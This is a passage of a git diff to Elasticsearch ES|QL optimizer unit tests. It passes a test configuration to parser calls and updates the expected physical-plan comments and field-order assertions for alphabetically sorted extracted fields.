+6798,7 @@ public void testTranslateMetricsGroupedByOneDimension() { public void testTranslateMetricsGroupedByTwoDimension() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS avg(rate(network.total_bytes_in)) BY cluster, pod"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); Eval eval = as(project.child(), Eval.class); assertThat(eval.fields(), hasSize(1)); @@ -6832,7 +6838,7 @@ public void testTranslateMetricsGroupedByTwoDimension() { public void testTranslateMetricsGroupedByTimeBucket() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(rate(network.total_bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -6866,7 +6872,7 @@ public void testTranslateMetricsGroupedByTimeBucketAndDimensions() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval eval = as(topN.child(), Eval.class); @@ -6908,7 +6914,7 @@ public void testTranslateSumOfTwoRates() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); TopN topN = as(plan, TopN.class); Aggregate finalAgg = as(topN.child(), Aggregate.class); Eval eval = as(finalAgg.child(), Eval.class); @@ -6929,7 +6935,7 @@ public void testTranslateMixedAggsGroupedByTimeBucketAndDimensions() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval eval = as(topN.child(), Eval.class); @@ -6981,7 +6987,7 @@ public void testAdjustMetricsRateBeforeFinalAgg() { | SORT cluster | LIMIT 10 """; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Project project = as(plan, Project.class); TopN topN = as(project.child(), TopN.class); Eval evalDiv = as(topN.child(), Eval.class); @@ -7034,7 +7040,7 @@ public void testAdjustMetricsRateBeforeFinalAgg() { public void testTranslateMaxOverTime() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(max_over_time(network.bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -7063,7 +7069,7 @@ public void testTranslateMaxOverTime() { public void testTranslateAvgOverTime() { assumeTrue("requires snapshot builds", Build.current().isSnapshot()); var query = "TS k8s | STATS sum(avg_over_time(network.bytes_in)) BY bucket(@timestamp, 1h)"; - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); Limit limit = as(plan, Limit.class); Aggregate finalAgg = as(limit.child(), Aggregate.class); assertThat(finalAgg, not(instanceOf(TimeSeriesAggregate.class))); @@ -7103,7 +7109,7 @@ public void testMetricsWithoutRate() { """); List plans = new ArrayList<>(); for (String query : queries) { - var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query))); + var plan = logicalOptimizer.optimize(metricsAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); plans.add(plan); } for (LogicalPlan plan : plans) { @@ -7694,7 +7700,7 @@ public void testPruneRedundantOrderBy() { | mv_expand x | sort y """; - LogicalPlan analyzed = analyzer.analyze(parser.createStatement(query)); + LogicalPlan analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); LogicalPlan optimized = rule.apply(analyzed); // check that all the redundant SORTs are removed in a single run diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java index b36cb3f6c6a42..fe4fd96120a01 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/OptimizerRulesTests.java @@ -8,6 +8,7 @@ import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.core.expression.Alias; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; @@ -128,7 +129,7 @@ protected Expression rule(Expression e, LogicalOptimizerContext ctx) { }; rule.apply( - new EsqlParser().createStatement("FROM index | EVAL x=f1+1 | KEEP x, f2 | LIMIT 1"), + new EsqlParser().createStatement("FROM index | EVAL x=f1+1 | KEEP x, f2 | LIMIT 1", EsqlTestUtils.TEST_CFG), new LogicalOptimizerContext(null, FoldContext.small()) ); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java index 99eded20b1687..7f4e1d4df6c82 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/PhysicalPlanOptimizerTests.java @@ -14,6 +14,7 @@ import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.set.Sets; import org.elasticsearch.compute.aggregation.AggregatorMode; @@ -128,14 +129,17 @@ import org.elasticsearch.xpack.esql.plan.physical.LimitExec; import org.elasticsearch.xpack.esql.plan.physical.LocalSourceExec; import org.elasticsearch.xpack.esql.plan.physical.LookupJoinExec; +import org.elasticsearch.xpack.esql.plan.physical.MvExpandExec; import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.plan.physical.ProjectExec; import org.elasticsearch.xpack.esql.plan.physical.TopNExec; import org.elasticsearch.xpack.esql.plan.physical.UnaryExec; import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.LocalExecutionPlanner; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import org.elasticsearch.xpack.esql.querydsl.query.EqualsSyntheticSourceDelegate; import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery; @@ -192,6 +196,7 @@ import static org.hamcrest.Matchers.closeTo; import static org.hamcrest.Matchers.contains; import static org.hamcrest.Matchers.containsInAnyOrder; +import static org.hamcrest.Matchers.containsInRelativeOrder; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; @@ -624,16 +629,16 @@ public void testTripleExtractorPerField() { } /** - * Expected - * LimitExec[10000[INTEGER]] - * \_AggregateExec[[],[AVG(salary{f}#14) AS x],FINAL] - * \_AggregateExec[[],[AVG(salary{f}#14) AS x],PARTIAL] - * \_FilterExec[ROUND(emp_no{f}#9) > 10[INTEGER]] - * \_TopNExec[[Order[last_name{f}#13,ASC,LAST]],10[INTEGER]] - * \_ExchangeExec[] - * \_ProjectExec[[salary{f}#14, first_name{f}#10, emp_no{f}#9, last_name{f}#13]] -- project away _doc - * \_FieldExtractExec[salary{f}#14, first_name{f}#10, emp_no{f}#9, last_n..] -- local field extraction - * \_EsQueryExec[test], query[][_doc{f}#16], limit[10], sort[[last_name]] + *LimitExec[10000[INTEGER],8] + * \_AggregateExec[[],[SUM(salary{f}#13460,true[BOOLEAN]) AS x#13454],FINAL,[$$x$sum{r}#13466, $$x$seen{r}#13467],8] + * \_AggregateExec[[],[SUM(salary{f}#13460,true[BOOLEAN]) AS x#13454],INITIAL,[$$x$sum{r}#13466, $$x$seen{r}#13467],8] + * \_FilterExec[ROUND(emp_no{f}#13455) > 10[INTEGER]] + * \_TopNExec[[Order[last_name{f}#13459,ASC,LAST]],10[INTEGER],58] + * \_ExchangeExec[[emp_no{f}#13455, last_name{f}#13459, salary{f}#13460],false] + * \_ProjectExec[[emp_no{f}#13455, last_name{f}#13459, salary{f}#13460]] -- project away _doc + * \_FieldExtractExec[emp_no{f}#13455, last_name{f}#13459, salary{f}#1346..] <[],[]> -- local field extraction + * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#13482], limit[10], + * sort[[FieldSort[field=last_name{f}#13459, direction=ASC, nulls=LAST]]] estimatedRowSize[74] */ public void testExtractorForField() { var plan = physicalPlan(""" @@ -657,7 +662,7 @@ public void testExtractorForField() { var exchange = asRemoteExchange(topN.child()); var project = as(exchange.child(), ProjectExec.class); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("salary", "emp_no", "last_name")); + assertThat(names(extract.attributesToExtract()), contains("emp_no", "last_name", "salary")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -2208,7 +2213,7 @@ public void testNoPushDownChangeCase() { * ages{f}#6, last_name{f}#7, long_noidx{f}#13, salary{f}#8],false] * \_ProjectExec[[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gender{f}#5, hire_date{f}#10, job{f}#11, job.raw{f}#12, langu * ages{f}#6, last_name{f}#7, long_noidx{f}#13, salary{f}#8]] - * \_FieldExtractExec[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gen..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#9, emp_no{f}#3, first_name{f}#4, gen..]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[{"esql_single_value":{"field":"first_name","next":{"regexp":{"first_name": * {"value":"foo*","flags_value":65791,"case_insensitive":true,"max_determinized_states":10000,"boost":0.0}}}, * "source":"TO_LOWER(first_name) RLIKE \"foo*\"@2:9"}}][_doc{f}#25], limit[1000], sort[] estimatedRowSize[332] @@ -2329,10 +2334,10 @@ public void testPushDownUpperCaseChangeLike() { * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9],false] * \_ProjectExec[[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, gender{f}#6, hire_date{f}#11, job{f}#12, job.raw{f}#13, lang * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9]] - * \_FieldExtractExec[_meta_field{f}#10, gender{f}#6, hire_date{f}#11, jo..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#10, gender{f}#6, hire_date{f}#11, jo..]<[],[]> * \_LimitExec[1000[INTEGER]] * \_FilterExec[LIKE(first_name{f}#5, "FOO*", true) OR IN(1[INTEGER],2[INTEGER],3[INTEGER],emp_no{f}#4 + 1[INTEGER])] - * \_FieldExtractExec[first_name{f}#5, emp_no{f}#4]<[],[]> + * \_FieldExtractExec[first_name{f}#5, emp_no{f}#4]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#26], limit[], sort[] estimatedRowSize[332] */ public void testChangeCaseAsInsensitiveWildcardLikeNotPushedDown() { @@ -2447,22 +2452,17 @@ public void testPushDownEvalFilter() { /** * - * ProjectExec[[last_name{f}#21 AS name, first_name{f}#18 AS last_name, last_name{f}#21 AS first_name]] - * \_TopNExec[[Order[last_name{f}#21,ASC,LAST]],10[INTEGER],0] - * \_ExchangeExec[[last_name{f}#21, first_name{f}#18],false] - * \_ProjectExec[[last_name{f}#21, first_name{f}#18]] - * \_FieldExtractExec[last_name{f}#21, first_name{f}#18][] - * \_EsQueryExec[test], indexMode[standard], query[{ - * "bool":{"must":[ - * {"esql_single_value":{ - * "field":"last_name", - * "next":{"range":{"last_name":{"gt":"B","boost":1.0}}}, - * "source":"first_name > \"B\"@3:9" - * }}, - * {"exists":{"field":"first_name","boost":1.0}} - * ],"boost":1.0}}][_doc{f}#40], limit[10], sort[[ - * FieldSort[field=last_name{f}#21, direction=ASC, nulls=LAST] - * ]] estimatedRowSize[116] + * ProjectExec[[last_name{f}#13858 AS name#13841, first_name{f}#13855 AS last_name#13844, last_name{f}#13858 AS first_name#13 + * 847]] + * \_TopNExec[[Order[last_name{f}#13858,ASC,LAST]],10[INTEGER],100] + * \_ExchangeExec[[first_name{f}#13855, last_name{f}#13858],false] + * \_ProjectExec[[first_name{f}#13855, last_name{f}#13858]] + * \_FieldExtractExec[first_name{f}#13855, last_name{f}#13858]<[],[]> + * \_EsQueryExec[test], indexMode[standard], query[ + * {"bool":{"must":[{"esql_single_value":{"field":"last_name","next": + * {"range":{"last_name":{"gt":"B","boost":0.0}}},"source":"first_name > \"B\"@3:9"}}, + * {"exists":{"field":"first_name","boost":0.0}}],"boost":1.0}} + * ][_doc{f}#13879], limit[10], sort[[FieldSort[field=last_name{f}#13858, direction=ASC, nulls=LAST]]] estimatedRowSize[116] * */ public void testPushDownEvalSwapFilter() { @@ -2483,7 +2483,7 @@ public void testPushDownEvalSwapFilter() { var extract = as(project.child(), FieldExtractExec.class); assertThat( extract.attributesToExtract().stream().map(Attribute::name).collect(Collectors.toList()), - contains("last_name", "first_name") + contains("first_name", "last_name") ); // Now verify the correct Lucene push-down of both the filter and the sort @@ -2596,7 +2596,7 @@ public void testDissect() { * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9, _index{m}#2],false] * \_ProjectExec[[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, gender{f}#6, hire_date{f}#11, job{f}#12, job.raw{f}#13, lang * uages{f}#7, last_name{f}#8, long_noidx{f}#14, salary{f}#9, _index{m}#2]] - * \_FieldExtractExec[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, ge..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#10, emp_no{f}#4, first_name{f}#5, ge..]<[],[]> * \_EsQueryExec[test], indexMode[standard], query[{"wildcard":{"_index":{"wildcard":"test*","boost":0.0}}}][_doc{f}#27], * limit[1000], sort[] estimatedRowSize[382] * @@ -3165,6 +3165,56 @@ public void testProjectAwayAllColumnsWhenOnlyTheCountMattersInStats() { assertThat(Expressions.names(esQuery.attrs()), contains("_doc")); } + /** + * LimitExec[1000[INTEGER],336] + * \_MvExpandExec[foo_1{r}#4236,foo_1{r}#4253] + * \_TopNExec[[Order[emp_no{f}#4242,ASC,LAST]],1000[INTEGER],336] + * \_ExchangeExec[[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#4243, gender{f}#4244, hire_date{f}#4249, job{f}#4250, job. + * raw{f}#4251, languages{f}#4245, last_name{f}#4246, long_noidx{f}#4252, salary{f}#4247, foo_1{r}#4236, foo_2{r}#4238], + * false] + * \_ProjectExec[[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#4243, gender{f}#4244, hire_date{f}#4249, job{f}#4250, job. + * raw{f}#4251, languages{f}#4245, last_name{f}#4246, long_noidx{f}#4252, salary{f}#4247, foo_1{r}#4236, foo_2{r}#4238]] + * \_FieldExtractExec[_meta_field{f}#4248, emp_no{f}#4242, first_name{f}#..]<[],[]> + * \_EvalExec[[1[INTEGER] AS foo_1#4236, 1[INTEGER] AS foo_2#4238]] + * \_EsQueryExec[test], indexMode[standard], query[][_doc{f}#4268], limit[1000], sort[[FieldSort[field=emp_no{f}#4242, + * direction=ASC, nulls=LAST]]] estimatedRowSize[352] + */ + public void testProjectAwayMvExpandColumnOrder() { + var plan = optimizedPlan(physicalPlan(""" + from test + | eval foo_1 = 1, foo_2 = 1 + | sort emp_no + | mv_expand foo_1 + """)); + var limit = as(plan, LimitExec.class); + var mvExpand = as(limit.child(), MvExpandExec.class); + var topN = as(mvExpand.child(), TopNExec.class); + var exchange = as(topN.child(), ExchangeExec.class); + var project = as(exchange.child(), ProjectExec.class); + + assertThat( + Expressions.names(project.projections()), + containsInRelativeOrder( + "_meta_field", + "emp_no", + "first_name", + "gender", + "hire_date", + "job", + "job.raw", + "languages", + "last_name", + "long_noidx", + "salary", + "foo_1", + "foo_2" + ) + ); + var fieldExtract = as(project.child(), FieldExtractExec.class); + var eval = as(fieldExtract.child(), EvalExec.class); + EsQueryExec esQuery = as(eval.child(), EsQueryExec.class); + } + /** * ProjectExec[[a{r}#5]] * \_EvalExec[[__a_SUM@81823521{r}#15 / __a_COUNT@31645621{r}#16 AS a]] @@ -5661,16 +5711,15 @@ public void testPushTopNWithFilterToSource() { } /** - * ProjectExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327]] - * \_TopNExec[[Order[abbrev{f}#12321,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327],false] - * \_ProjectExec[[abbrev{f}#12321, name{f}#12322, location{f}#12325, country{f}#12326, city{f}#12327]] - * \_FieldExtractExec[abbrev{f}#12321, name{f}#12322, location{f}#12325, ..][] + * ProjectExec[[abbrev{f}#4474, name{f}#4475, location{f}#4478, country{f}#4479, city{f}#4480]] + * \_TopNExec[[Order[abbrev{f}#4474,ASC,LAST]],5[INTEGER],221] + * \_ExchangeExec[[abbrev{f}#4474, city{f}#4480, country{f}#4479, location{f}#4478, name{f}#4475],false] + * \_ProjectExec[[abbrev{f}#4474, city{f}#4480, country{f}#4479, location{f}#4478, name{f}#4475]] + * \_FieldExtractExec[abbrev{f}#4474, city{f}#4480, country{f}#4479, loca..]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#12337], - * limit[5], - * sort[[FieldSort[field=abbrev{f}#12321, direction=ASC, nulls=LAST]]] estimatedRowSize[237] + * indexMode[standard], + * query[][_doc{f}#4490], + * limit[5], sort[[FieldSort[field=abbrev{f}#4474, direction=ASC, nulls=LAST]]] estimatedRowSize[237] */ public void testPushTopNKeywordToSource() { var optimized = optimizedPlan(physicalPlan(""" @@ -5685,9 +5734,9 @@ public void testPushTopNKeywordToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "location", "name")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -5703,13 +5752,13 @@ public void testPushTopNKeywordToSource() { /** * - * ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, abbrev{f}#12 AS code]] - * \_TopNExec[[Order[abbrev{f}#12,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18],false] - * \_ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18]] - * \_FieldExtractExec[abbrev{f}#12, name{f}#13, location{f}#16, country{f..][] - * \_EsQueryExec[airports], indexMode[standard], query[][_doc{f}#29], limit[5], - * sort[[FieldSort[field=abbrev{f}#12, direction=ASC, nulls=LAST]]] estimatedRowSize[237] + * ProjectExec[[abbrev{f}#7828, name{f}#7829, location{f}#7832, country{f}#7833, city{f}#7834, abbrev{f}#7828 AS code#7820]] + * \_TopNExec[[Order[abbrev{f}#7828,ASC,LAST]],5[INTEGER],221] + * \_ExchangeExec[[abbrev{f}#7828, city{f}#7834, country{f}#7833, location{f}#7832, name{f}#7829],false] + * \_ProjectExec[[abbrev{f}#7828, city{f}#7834, country{f}#7833, location{f}#7832, name{f}#7829]] + * \_FieldExtractExec[abbrev{f}#7828, city{f}#7834, country{f}#7833, loca..]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[][_doc{f}#7845], limit[5], + * sort[[FieldSort[field=abbrev{f}#7828, direction=ASC, nulls=LAST]]] estimatedRowSize[237] * */ public void testPushTopNAliasedKeywordToSource() { @@ -5727,9 +5776,9 @@ public void testPushTopNAliasedKeywordToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "location", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "location", "name")); var source = source(extract.child()); assertThat(source.limit(), is(topN.limit())); assertThat(source.sorts(), is(fieldSorts(topN.order()))); @@ -5744,19 +5793,19 @@ public void testPushTopNAliasedKeywordToSource() { } /** - * ProjectExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#11, name{f}#12, location{f}#15, country{f}#16, city{f}#17, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#11, name{f}#12, country{f}#16, city{f}#17][] - * \_EvalExec[[STDISTANCE(location{f}#15,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) - * AS distance]] - * \_FieldExtractExec[location{f}#15][] + * ProjectExec[[abbrev{f}#7283, name{f}#7284, location{f}#7287, country{f}#7288, city{f}#7289]] + * \_TopNExec[[Order[distance{r}#7276,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#7283, city{f}#7289, country{f}#7288, location{f}#7287, name{f}#7284, distance{r}#7276],false] + * \_ProjectExec[[abbrev{f}#7283, city{f}#7289, country{f}#7288, location{f}#7287, name{f}#7284, distance{r}#7276]] + * \_FieldExtractExec[abbrev{f}#7283, city{f}#7289, country{f}#7288, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#7287,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#7276]] + * \_FieldExtractExec[location{f}#7287]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#28], - * limit[5], - * sort[[GeoDistanceSort[field=location{f}#15, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * indexMode[standard], + * query[][_doc{f}#7300], + * limit[5], + * sort[[GeoDistanceSort[field=location{f}#7287, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] */ public void testPushTopNDistanceToSource() { var optimized = optimizedPlan(physicalPlan(""" @@ -5772,9 +5821,9 @@ public void testPushTopNDistanceToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -5801,20 +5850,19 @@ public void testPushTopNDistanceToSource() { } /** - * ProjectExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14]] - * \_TopNExec[[Order[$$order_by$0$0{r}#16,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14, $$order_by$0$0{r}#16],false] - * \_ProjectExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14, $$order_by$0$0{r}#16]] - * \_FieldExtractExec[abbrev{f}#8, name{f}#9, country{f}#13, city{f}#14][] - * \_EvalExec[[ - * STDISTANCE(location{f}#12,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS $$order_by$0$0 - * ]] - * \_FieldExtractExec[location{f}#12][] + *ProjectExec[[abbrev{f}#5258, name{f}#5259, location{f}#5262, country{f}#5263, city{f}#5264]] + * \_TopNExec[[Order[$$order_by$0$0{r}#5266,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#5258, city{f}#5264, country{f}#5263, location{f}#5262, name{f}#5259, $$order_by$0$0{r}#5266],false] + * \_ProjectExec[[abbrev{f}#5258, city{f}#5264, country{f}#5263, location{f}#5262, name{f}#5259, $$order_by$0$0{r}#5266]] + * \_FieldExtractExec[abbrev{f}#5258, city{f}#5264, country{f}#5263, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#5262,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS $$orde + * r_by$0$0#5266]] + * \_FieldExtractExec[location{f}#5262]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#26], - * limit[5], - * sort[[GeoDistanceSort[field=location{f}#12, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * indexMode[standard], + * query[][_doc{f}#5276], + * limit[5], + * sort[[GeoDistanceSort[field=location{f}#5262, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] */ public void testPushTopNInlineDistanceToSource() { var optimized = optimizedPlan(physicalPlan(""" @@ -5834,15 +5882,15 @@ public void testPushTopNInlineDistanceToSource() { names(project.projections()), contains( equalTo("abbrev"), - equalTo("name"), - equalTo("location"), - equalTo("country"), equalTo("city"), + equalTo("country"), + equalTo("location"), + equalTo("name"), startsWith("$$order_by$0$") ) ); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), startsWith("$$order_by$0$")); @@ -5871,14 +5919,14 @@ public void testPushTopNInlineDistanceToSource() { /** * - * ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#12, name{f}#13, country{f}#17, city{f}#18][] - * \_EvalExec[[STDISTANCE(location{f}#16,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance - * ]] - * \_FieldExtractExec[location{f}#16][] + * ProjectExec[[abbrev{f}#361, name{f}#362, location{f}#365, country{f}#366, city{f}#367]] + * \_TopNExec[[Order[distance{r}#353,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#361, city{f}#367, country{f}#366, location{f}#365, name{f}#362, distance{r}#353],false] + * \_ProjectExec[[abbrev{f}#361, city{f}#367, country{f}#366, location{f}#365, name{f}#362, distance{r}#353]] + * \_FieldExtractExec[abbrev{f}#361, city{f}#367, country{f}#366, name{f}..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#365,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distanc + * e#353]] + * \_FieldExtractExec[location{f}#365]<[],[]> * \_EsQueryExec[airports], indexMode[standard], query[ * { * "geo_shape":{ @@ -5891,7 +5939,7 @@ public void testPushTopNInlineDistanceToSource() { * } * } * } - * }][_doc{f}#29], limit[5], sort[[GeoDistanceSort[field=location{f}#16, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * ][_doc{f}#378], limit[5], sort[[GeoDistanceSort[field=location{f}#365, direction=ASC, lat=55.673, lon=12.565]]] 